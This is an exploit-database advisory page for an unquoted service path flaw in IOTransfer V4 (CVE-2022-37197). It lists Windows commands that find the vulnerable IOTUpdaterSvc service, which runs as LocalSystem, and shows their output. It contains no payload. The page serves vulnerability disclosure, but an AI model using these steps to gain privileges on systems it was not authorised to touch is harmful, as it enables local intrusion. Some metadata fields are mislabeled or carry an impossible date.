header-logo
Suggest Exploit
vendor:
IOTransfer
by:
BLAY ABU SAFIAN (Inveteck Global)
7.8
CVSS
HIGH
Unquoted Service Path
428
CWE
Product Name: IOTransfer
Affected Version From: IOTransfer V4
Affected Version To: IOTransfer V4
Patch Exists: NO
Related CWE: CVE-2022-37197
CPE: a:iobit:iotransfer:4
Metasploit:
Other Scripts:
Platforms Tested: Microsoft Windows Server 2019 Standard Evaluation
2022

IOTransfer V4 – Unquoted Service Path

The IOTransfer V4 software on Microsoft Windows Server 2019 Standard Evaluation allows local users to gain privileges via an unquoted service path vulnerability.

Mitigation:

To mitigate this vulnerability, the vendor should ensure that the service path is quoted correctly in the software code.
Source

Exploit-DB raw data:

# Exploit Title: IOTransfer V4 - Unquoted Service Path
# Exploit Author: BLAY ABU SAFIAN (Inveteck Global)
# Discovery Date: 2022-28-07
# Vendor Homepage: http://www.iobit.com/en/index.php
# Software Link: https://iotransfer.itopvpn.com/download/
# Tested Version: V4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows Server 2019 Standard Evaluation CVE-2022-37197
# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

IOTransfer Updater IOTUpdaterSvc C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe
                      Auto

C:\>sc qc IOTUpdaterSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IOTUpdaterSvc
        TYPE : 10 WIN32_OWN_PROCESS
        START_TYPE : 2 AUTO_START
        ERROR_CONTROL : 1 NORMAL
        BINARY_PATH_NAME : C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe


LOAD_ORDER_GROUP :
        TAG : 0
        DISPLAY_NAME : IOTransfer Updater
        DEPENDENCIES :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo

OS Name: Microsoft Windows Server 2019 Standard Evaluation
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation